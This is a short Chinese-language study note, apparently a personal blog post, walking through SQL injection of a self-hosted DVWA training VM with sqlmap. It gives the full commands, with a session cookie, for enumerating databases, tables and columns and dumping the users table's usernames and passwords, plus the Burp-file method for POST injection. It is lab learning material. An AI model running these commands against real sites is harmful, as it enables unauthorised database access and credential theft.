sqlmap+DVWA渗透笔记
学习使用sqlmap,自己搭建了虚拟机环境,利用DVWA网站进行了最简单的注入,如下是自己的学习笔记.
1.尝试注入
sqlmap -u "http://10.18.115.225/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit&user_token=65cf36236db48e0abd1ac643d3f6fc0d#"
发现跳转到login页面,说明需要Cookie维持会话
2.加入cookie尝试
sqlmap -u "http://10.18.115.225/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit&user_token=65cf36236db48e0abd1ac643d3f6fc0d#" --cookie="security=low;PHPSESSID=t63fuq5mgh7i9ck9lo4bb7g767"
3.爆出数据库类型
4.爆数据库名
sqlmap -u "http://10.18.115.225/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit&user_token=65cf36236db48e0abd1ac643d3f6fc0d#" --cookie="security=low;PHPSESSID=t63fuq5mgh7i9ck9lo4bb7g767" --dbs
结果:
5.爆表名
sqlmap -u "http://10.18.115.225/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit&user_token=65cf36236db48e0abd1ac643d3f6fc0d#" --cookie="security=low;PHPSESSID=t63fuq5mgh7i9ck9lo4bb7g767" -D dvwa --tables
结果:
6.爆列名
sqlmap -u "http://10.18.115.225/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit&user_token=65cf36236db48e0abd1ac643d3f6fc0d#" --cookie="security=low;PHPSESSID=t63fuq5mgh7i9ck9lo4bb7g767" -D dvwa -T users --columns
结果:
7.爆字段
sqlmap -u "http://10.18.115.225/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit&user_token=65cf36236db48e0abd1ac643d3f6fc0d#" --cookie="security=low;PHPSESSID=t63fuq5mgh7i9ck9lo4bb7g767" -D dvwa -T users -C user,password --dump
结果:
补充:
如果是POST注入的话,我们只需要用抓包工具(如burpsuite)抓包,然后将包内容复制到一个.txt文本中,使用如下命令进行注入:
sqlmap.py -r "path\post.txt" -p n
-r :后接txt文件的路径
-p:指定存在注入的参数n
其他就和get注入一样。